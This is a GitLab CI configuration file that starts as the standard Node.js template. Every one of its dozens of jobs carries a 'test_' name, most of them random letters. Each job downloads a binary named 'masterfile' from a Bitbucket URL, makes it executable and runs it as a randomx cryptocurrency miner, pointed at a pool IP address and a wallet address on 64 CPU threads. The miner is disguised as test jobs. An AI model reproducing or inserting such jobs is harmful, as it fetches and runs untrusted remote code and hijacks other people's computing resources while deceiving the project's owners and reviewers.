# This file is a template, and might need editing before it works on your project.
# Official framework image. Look for the different tagged releases at:
# https://hub.docker.com/r/library/node/tags/
image: node:latest

# Pick zero or more services to be used on all builds.
# Only needed when using a docker container to run your tests in.
# Check out: http://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service
services:
  - mysql:latest
  - redis:latest
  - postgres:latest

# This folder is cached between builds
# http://docs.gitlab.com/ee/ci/yaml/README.html#cache
cache:
  paths:
    - node_modules/

test_async:
  script:
    -   apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_db:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asfync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_ddb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_assync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dab:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_ashync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_dbr:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_ashync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dbc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asjync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dfdb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asynfc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dhb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyknc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_ddb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyntc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_ddb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asydnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dfb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyhnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dhb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyjnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dfb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyjnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_vcdb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asynnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_vdb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asy,nc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_deb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asyudnc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dxb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_asjkync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   


test_dfhb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_dxhb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_dchb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_dfhz:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_afhb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_zzzzzz:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_uyeruyue:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_iopljn:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_nmnkjoj:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_uiwuerjw:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_poijhbnjhg:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_oiuytresdfghb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_qjwkasmndkfjeruij:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_kfdskfj:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_fkewlkfel:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_lkrelkgrl:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_kklfwejgwrhjj:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_jdksjkdjfiew:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_otiewrjnrghj:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_rgeokgroerkg:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_ekrgjegjerigj:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_zmcznmnvm:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   

test_kgjerogjreo:
  script:
    -   apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Pekerja01+120000 --cpu-threads 64;   
